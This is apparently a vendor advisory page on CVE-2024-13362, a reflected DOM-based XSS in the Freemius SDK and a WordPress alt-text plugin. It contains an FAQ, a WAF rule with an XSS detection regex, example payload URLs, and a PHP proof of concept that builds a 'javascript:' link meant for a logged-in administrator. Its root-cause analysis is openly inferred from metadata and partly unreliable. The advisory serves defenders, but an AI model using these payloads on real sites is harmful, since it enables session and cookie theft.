What is CVE-2024-13362?

CVE-2024-13362 is a Reflected DOM-Based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK and the Bulk Image Alt Text with Yoast plugin. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the ‘url’ parameter, potentially executing malicious scripts in a user’s browser.

Who is affected by this vulnerability?

WordPress sites using the Freemius SDK version 2.10.1 or lower, specifically those with the Bulk Image Alt Text with Yoast plugin version 2.1.0, are at risk. Administrators and users who interact with affected pages are particularly vulnerable to exploitation.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Bulk Image Alt Text with Yoast plugin and the Freemius SDK in use. If you are running versions 2.1.0 or lower for the plugin or 2.10.1 or lower for the SDK, your site is susceptible to this vulnerability.

What does a CVSS score of 6.1 indicate?

A CVSS score of 6.1 indicates a medium severity level, suggesting that while the vulnerability is serious, it requires user interaction to exploit. This score reflects the potential impact on confidentiality and integrity, which are rated as low.

What are the potential risks of this vulnerability?

If exploited, attackers can execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, cookie theft, or redirection to malicious sites. However, since this is a reflected XSS, the impact is less severe than stored XSS, as it requires user interaction.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the Bulk Image Alt Text with Yoast plugin to version 2.2.0 or higher, which includes a fix. Additionally, ensure that all plugins and themes using the Freemius SDK are updated to their latest versions.

What does 'Reflected DOM-Based XSS' mean?

Reflected DOM-Based XSS refers to a type of cross-site scripting where the attack payload is reflected off a web server, typically via a URL parameter. In this case, the vulnerability arises from insufficient input sanitization, allowing attackers to inject scripts that execute in the user’s browser.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can craft a malicious URL containing a JavaScript payload in the ‘url’ parameter. When a user clicks this link, the injected script executes in their browser, demonstrating the vulnerability’s potential impact.

What is the role of the Freemius SDK in this vulnerability?

The Freemius SDK is integrated into the Bulk Image Alt Text with Yoast plugin, and the vulnerability arises from how it handles the ‘url’ parameter. The SDK’s improper sanitization of user input allows for the injection of malicious scripts.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the affected plugin until a patch can be applied. Additionally, educate users about the risks and avoid clicking on suspicious links until the vulnerability is resolved.

Are there any other plugins or themes affected by this vulnerability?

While the primary focus is on the Bulk Image Alt Text with Yoast plugin, any other WordPress plugins or themes that utilize the vulnerable version of the Freemius SDK may also be affected. It is advisable to review all plugins that integrate with Freemius.

How can I stay informed about vulnerabilities like CVE-2024-13362?

To stay informed, subscribe to security bulletins from WordPress, follow reputable security blogs, and monitor CVE databases. Regularly check for updates to plugins and themes you use, as well as security advisories related to them.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (bulk-image-alt-text-with-yoast)

CVE ID CVE-2024-13362

Plugin bulk-image-alt-text-with-yoast

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.1.0

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This is a Reflected DOM-Based Cross-Site Scripting vulnerability affecting the Freemius SDK (version <= 2.10.1) and specifically the 'Bulk Image Alt Text with Yoast' plugin (version 2.1.0) which bundles the vulnerable SDK. The vulnerability allows unauthenticated attackers to inject arbitrary JavaScript into pages via the 'url' parameter. The CVSS score of 6.1 (Medium) reflects the requirement for user interaction (clicking a link) and the limited impact on confidentiality and integrity (both rated Low).

The root cause is improper neutralization of user-supplied input during web page generation (CWE-79). Based on the description and the DOM-Based classification, this vulnerability likely exists in a JavaScript file or inline script that reads the 'url' parameter from the URL query string and injects it into the DOM without proper sanitization or escaping. Since no source code is available, Atomic Edge research infers that the vulnerable code uses a function like 'window.location.search' or URLSearchParams to extract the 'url' parameter value and then writes it directly to innerHTML or document.write without encoding. Confirmed facts are limited to the CVE metadata and the Wordfence reference, which indicates a reflected XSS requiring user interaction.

Exploitation requires an attacker to craft a malicious link containing a JavaScript payload in the 'url' parameter. The typical attack surface is any page on a WordPress site that includes Freemius JavaScript, such as the plugin activation or deactivation flow, admin screens, or frontend pages where Freemius SDK scripts are enqueued. An example exploit URL would be: 'https://target.com/?url=javascript:alert(document.cookie)' or 'https://target.com/?url=‘. The attacker must trick an administrator or user into clicking the link. The lack of nonce verification or capability checks in the vulnerable JavaScript handler is not relevant here because JavaScript executes in the browser, and the server-side code likely passes the parameter without sanitization.

Remediation requires the plugin/theme developer to properly escape or sanitize the ‘url’ parameter before injecting it into the DOM. For the Freemius SDK, the fix (version 2.11.0) likely validates the ‘url’ parameter against a whitelist of allowed URLs or uses ‘urlencode()’ and ‘esc_js()’ functions to neutralize XSS payloads. Atomic Edge analysis recommends that users update to the patched version of any plugin or theme using the Freemius SDK (e.g., Bulk Image Alt Text with Yoast version 2.2.0).

If successfully exploited, an attacker can execute arbitrary JavaScript in the context of the victim’s browser session. This can lead to session hijacking, cookie theft, defacement of the current page, or redirection to malicious sites. However, because the XSS is reflected and requires user interaction, the impact is limited compared to stored XSS. Unauthenticated attackers can target any user, including administrators, potentially gaining elevated privileges if the admin clicks the malicious link while logged in.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# This rule targets Reflected XSS via the 'url' parameter in Freemius SDK JavaScript.
# The attack vector is any page that includes Freemius scripts, identifiable by the presence of 'freemius' in query string or path.
SecRule QUERY_STRING "@contains freemius" 
  "id:202613362,phase:1,deny,status:403,chain,msg:'CVE-2024-13362 - Reflected XSS via url parameter (Freemius SDK)',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS:url "@rx <script|data:|javascript:|onw+s*=" 
    "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Set your target WordPress site URL here (e.g., "http://example.com")
$target_url = "http://target-site.com";

// The vulnerable parameter is 'url'. The payload executes in the victim's browser.
// We'll craft a link that an attacker would send to a victim.
$payload = "javascript:alert('XSS_PoC')";

// Construct the malicious URL
$malicious_url = rtrim($target_url, '/') . '/?' . http_build_query(['url' => $payload]);

echo "[+] Atomic Edge PoC for CVE-2024-13362n";
echo "[+] Target: $target_urln";
echo "[+] Malicious URL: $malicious_urln";
echo "[+] Instructions: Send this URL to a logged-in administrator or user.n";
echo "[+] If the vulnerability exists, the XSS alert will execute in their browser.n";
echo "[+] Note: This PoC assumes the 'url' parameter is read by Freemius JavaScript on the page.n";

// Optional: Use cURL to verify the page content contains the parameter (but XSS requires browser execution)
function check_xss_trigger($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response = curl_exec($ch);
    curl_close($ch);

    // Check if the response contains our payload (without encoding) to see if it's reflected
    if (strpos($response, "javascript:alert('XSS_PoC')") !== false) {
        echo "[+] The page content reflects the payload in the HTML source. Likely vulnerable.n";
    } else {
        echo "[-] The payload was not found in the response. It may be encoded or not reflected server-side (DOM-based).n";
    }
}

check_xss_trigger($malicious_url);

echo "[!] PoC complete. Manual browser testing is required to confirm DOM execution.n";

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a Reflected DOM-Based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK and the Bulk Image Alt Text with Yoast plugin. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the ‘url’ parameter, potentially executing malicious scripts in a user’s browser.
Who is affected by this vulnerability?
Identifying impacted users
WordPress sites using the Freemius SDK version 2.10.1 or lower, specifically those with the Bulk Image Alt Text with Yoast plugin version 2.1.0, are at risk. Administrators and users who interact with affected pages are particularly vulnerable to exploitation.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To determine if your site is vulnerable, check the version of the Bulk Image Alt Text with Yoast plugin and the Freemius SDK in use. If you are running versions 2.1.0 or lower for the plugin or 2.10.1 or lower for the SDK, your site is susceptible to this vulnerability.
What does a CVSS score of 6.1 indicate?
Understanding the severity rating
A CVSS score of 6.1 indicates a medium severity level, suggesting that while the vulnerability is serious, it requires user interaction to exploit. This score reflects the potential impact on confidentiality and integrity, which are rated as low.
What are the potential risks of this vulnerability?
Consequences of exploitation
If exploited, attackers can execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, cookie theft, or redirection to malicious sites. However, since this is a reflected XSS, the impact is less severe than stored XSS, as it requires user interaction.
How can I mitigate this vulnerability?
Steps to secure your site
To mitigate this vulnerability, update the Bulk Image Alt Text with Yoast plugin to version 2.2.0 or higher, which includes a fix. Additionally, ensure that all plugins and themes using the Freemius SDK are updated to their latest versions.
What does 'Reflected DOM-Based XSS' mean?
Explaining the attack vector
Reflected DOM-Based XSS refers to a type of cross-site scripting where the attack payload is reflected off a web server, typically via a URL parameter. In this case, the vulnerability arises from insufficient input sanitization, allowing attackers to inject scripts that execute in the user’s browser.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC provided
The proof of concept illustrates how an attacker can craft a malicious URL containing a JavaScript payload in the ‘url’ parameter. When a user clicks this link, the injected script executes in their browser, demonstrating the vulnerability’s potential impact.
What is the role of the Freemius SDK in this vulnerability?
Connection to the affected plugin
The Freemius SDK is integrated into the Bulk Image Alt Text with Yoast plugin, and the vulnerability arises from how it handles the ‘url’ parameter. The SDK’s improper sanitization of user input allows for the injection of malicious scripts.
What should I do if I cannot update the plugin immediately?
Temporary measures for affected sites
If immediate updates are not possible, consider disabling the affected plugin until a patch can be applied. Additionally, educate users about the risks and avoid clicking on suspicious links until the vulnerability is resolved.
Are there any other plugins or themes affected by this vulnerability?
Scope of the vulnerability
While the primary focus is on the Bulk Image Alt Text with Yoast plugin, any other WordPress plugins or themes that utilize the vulnerable version of the Freemius SDK may also be affected. It is advisable to review all plugins that integrate with Freemius.
How can I stay informed about vulnerabilities like CVE-2024-13362?
Keeping up with security updates
To stay informed, subscribe to security bulletins from WordPress, follow reputable security blogs, and monitor CVE databases. Regularly check for updates to plugins and themes you use, as well as security advisories related to them.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations